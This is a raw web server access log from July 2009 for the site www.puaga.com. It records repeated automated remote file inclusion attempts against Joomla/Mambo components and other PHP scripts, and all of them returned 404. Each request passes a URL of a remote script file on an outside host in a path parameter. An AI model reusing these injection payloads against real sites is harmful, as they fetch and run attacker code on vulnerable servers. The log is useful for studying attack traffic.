195.34.78.110 - - [05/Jul/2009:11:41:17 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:11:41:17 -0700] "GET /logs/access_090609.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:41:18 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:41:19 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:41:21 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:41:22 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:11:41:28 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:11:41:28 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:11:41:28 -0700] "GET /logs/access_090609.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:41:31 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:41:31 -0700] "GET /logs/access_090619.log%20%20//mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:41:32 -0700] "GET /logs/access_090614.log%20%20//mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:41:32 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:41:32 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:41:46 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:41:46 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:41:46 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:41:52 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:41:52 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:41:52 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:42:05 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:42:06 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:42:06 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:42:06 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:42:11 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:42:15 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:42:17 -0700] "GET /modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:42:17 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:42:17 -0700] "GET /logs/access_090516.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:42:19 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:42:33 -0700] "GET /logs/access_090606.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:42:35 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:42:51 -0700] "GET /logs/access_090526.log/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:43:25 -0700] "GET /logs/access_090511.log/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:43:26 -0700] "GET /images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:43:27 -0700] "GET /logs/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:44:00 -0700] "GET /logs/access_090516.log%20%20//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:44:05 -0700] "GET /logs/access_090608.log%20%20//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:11:44:08 -0700] "GET /logs/access_090610.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.34.78.110 - - [05/Jul/2009:11:44:10 -0700] "GET /logs/access_090610.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:44:21 -0700] "GET /logs/access_090516.log%20%20//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:44:26 -0700] "GET /logs/access_090525.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:44:28 -0700] "GET /logs/access_090608.log%20%20//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:44:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:44:55 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:44:56 -0700] "GET /logs/access_090614.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:45:14 -0700] "GET /logs/access_090522.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:45:21 -0700] "GET /logs/access_090525.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:45:23 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:45:23 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:45:23 -0700] "GET /logs/access_090522.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:45:28 -0700] "GET /logs/access_090522.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:45:31 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:45:31 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:45:31 -0700] "GET /logs/access_090522.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:45:51 -0700] "GET /logs/access_090518.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:45:53 -0700] "GET /logs/access_090522.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:46:05 -0700] "GET /logs/access_090516.log%20%20//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:11:46:17 -0700] "GET /logs/access_090510.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:46:18 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:20 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:20 -0700] "GET /components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:20 -0700] "GET /logs/access_090525.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
98.116.62.213 - - [05/Jul/2009:11:46:21 -0700] "GET /logs/access_090605.log%20%20/config.php?inc_dir=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:23 -0700] "GET /components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:23 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:23 -0700] "GET /logs/access_090525.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:46:26 -0700] "GET /logs/access_090518.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:46:43 -0700] "GET /logs/access_090608.log%20%20//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:47 -0700] "GET /logs/access_090516.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:46:50 -0700] "GET /logs/access_090608.log//modules/xfsection/modify.php?dir_module=http://fritzcomforthomes.com/kx[1].txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:46:50 -0700] "GET /logs/access_090516.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:47:22 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:47:22 -0700] "GET /logs/access_090525.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:47:27 -0700] "GET /components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:47:27 -0700] "GET /components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:47:27 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:47:27 -0700] "GET /logs/access_090525.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:47:28 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:47:57 -0700] "GET /logs/access_090525.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:48:10 -0700] "GET /logs/access_090525.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:48:10 -0700] "GET /logs/access_090522.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.197.183.21 - - [05/Jul/2009:11:48:15 -0700] "GET /logs/access_090518.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:48:45 -0700] "GET /logs/access_090516.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:48:53 -0700] "GET /logs/access_090516.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:49:12 -0700] "GET /logs/access_090614.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:49:18 -0700] "GET /logs/access_090519.log//Neos_Chronos/header.php?base_folder=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.16.115.69 - - [05/Jul/2009:11:49:28 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.16.115.69 - - [05/Jul/2009:11:49:28 -0700] "GET /logs/access_090522.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.16.115.69 - - [05/Jul/2009:11:49:28 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:49:54 -0700] "GET /logs/access_090606.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
98.116.62.213 - - [05/Jul/2009:11:49:57 -0700] "GET /logs/access_090531.log%20%20/config.php?inc_dir=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:50:02 -0700] "GET /logs/access_090525.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:11:50:19 -0700] "GET /logs/access_090622.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
62.16.115.69 - - [05/Jul/2009:11:50:20 -0700] "GET /logs/access_090518.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:50:22 -0700] "GET /logs/access_090205.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:51:07 -0700] "GET /logs/access_090205.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:51:11 -0700] "GET /logs/access_090606.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:51:35 -0700] "GET /logs/access_090614.log//mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:51:36 -0700] "GET /logs/access_090619.log//mwchat/libs/start_lobby.php?CONFIG%5BMWCHAT_Libs%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:52:23 -0700] "GET /logs/access_090205.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:52:33 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:52:33 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:52:33 -0700] "GET /logs/access_090609.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.16.115.69 - - [05/Jul/2009:11:52:42 -0700] "GET /logs/access_090522.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.16.115.69 - - [05/Jul/2009:11:53:07 -0700] "GET /logs/access_090518.log%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.29.81.145 - - [05/Jul/2009:11:53:21 -0700] "GET /logs/access_090205.log//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:53:28 -0700] "GET /logs/access_090610.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [05/Jul/2009:11:54:20 -0700] "GET /logs/access_090518.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:11:54:59 -0700] "GET /logs/access_090518.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:55:42 -0700] "GET /logs/access_090609.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
